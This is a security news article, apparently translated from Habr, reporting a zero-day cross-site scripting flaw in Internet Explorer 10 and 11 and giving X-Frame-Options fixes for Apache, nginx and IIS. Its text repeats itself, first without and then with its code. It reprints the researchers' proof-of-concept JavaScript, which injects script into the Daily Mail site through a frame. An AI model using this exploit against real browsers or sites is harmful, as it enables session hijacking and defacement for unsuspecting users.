Zero-day XSS vulnerability in Internet Explorer allows you to attack any sites
Yesterday it became known that a previously unknown cross-site scripting vulnerability appeared in Microsoft Internet Explorer. Using this error, a remote user can embed an arbitrary JavaScript script into the HTML page to bypass the policy of unity of origin on almost any site.
Researchers at deusen.co.uk, who have posted the PoC code of the exploit, have demonstrated exploitation of the vulnerability on the website of the first largest print run in the UK Daily Mail . When you click on a specially formed link, the user is redirected to the site dailymail.co.uk, after which the message “Hacked by Deusen” is displayed.
')
The exploit code itself looks like this:
Vulnerability is present in Internet Explorer 10.x and 11.x. A detailed description of the vulnerability is available at www.securitylab.ru/vulnerability/470863.php .
Several examples of exploiting vulnerabilities have already appeared on the network, from which it can be seen that many sites are under threat. Here is an example of the PHDays V International Security Forum portal:
Third-party iframes must be disabled using the X-Frame-Options header option sent by the web server.
For Apache, the setting in .htaccess will look like this:
For nginx :
For IIS :
In the absence of the ability to quickly configure servers, you can protect yourself using Web Application Firewall class solutions (for example, PT Application Firewall settings).
It is worth noting that, in general, 0day has recently become more frequent in infrastructure components — Shellshock, ghost, and others. Google is adding fuel to the fire, revealing details of the gaps in Windows despite Microsoft’s calls for a more flexible vulnerability disclosure system. It seems that the usual approach in the environment of researchers “learned, helped close vulnerability, published details” no longer works.
Researchers at deusen.co.uk, who have posted the PoC code of the exploit, have demonstrated exploitation of the vulnerability on the website of the first largest print run in the UK Daily Mail . When you click on a specially formed link, the user is redirected to the site dailymail.co.uk, after which the message “Hacked by Deusen” is displayed.
')
The exploit code itself looks like this:
function go() { w=window.frames[0]; w.setTimeout("alert(eval('x=top.frames[1];r=confirm(\\'Close this window after 3 seconds...\\');x.location=\\'javascript:%22%3Cscript%3Efunction%20a()%7Bw.document.body.innerHTML%3D%27%3Ca%20style%3Dfont-size%3A50px%3EHacked%20by%20Deusen%3C%2Fa%3E%27%3B%7D%20function%20o()%7Bw%3Dwindow.open(%27http%3A%2F%2Fwww.dailymail.co.uk%27%2C%27_blank%27%2C%27top%3D0%2C%20left%3D0%2C%20width%3D800%2C%20height%3D600%2C%20location%3Dyes%2C%20scrollbars%3Dyes%27)%3BsetTimeout(%27a()%27%2C7000)%3B%7D%3C%2Fscript%3E%3Ca%20href%3D%27javascript%3Ao()%3Bvoid(0)%3B%27%3EGo%3C%2Fa%3E%22\\';'))",1); } setTimeout("go()",1000); Vulnerability is present in Internet Explorer 10.x and 11.x. A detailed description of the vulnerability is available at www.securitylab.ru/vulnerability/470863.php .
Several examples of exploiting vulnerabilities have already appeared on the network, from which it can be seen that many sites are under threat. Here is an example of the PHDays V International Security Forum portal:
Ways to protect
Third-party iframes must be disabled using the X-Frame-Options header option sent by the web server.
For Apache, the setting in .htaccess will look like this:
Header always append X-Frame-Options SAMEORIGINFor nginx :
add_header X-Frame-Options SAMEORIGIN;For IIS :
<system.webServer> ... <httpProtocol> <customHeaders> <add name="X-Frame-Options" value="SAMEORIGIN" /> </customHeaders> </httpProtocol> ... </system.webServer> In the absence of the ability to quickly configure servers, you can protect yourself using Web Application Firewall class solutions (for example, PT Application Firewall settings).
It is worth noting that, in general, 0day has recently become more frequent in infrastructure components — Shellshock, ghost, and others. Google is adding fuel to the fire, revealing details of the gaps in Windows despite Microsoft’s calls for a more flexible vulnerability disclosure system. It seems that the usual approach in the environment of researchers “learned, helped close vulnerability, published details” no longer works.
Source: https://habr.com/ru/post/249809/
All Articles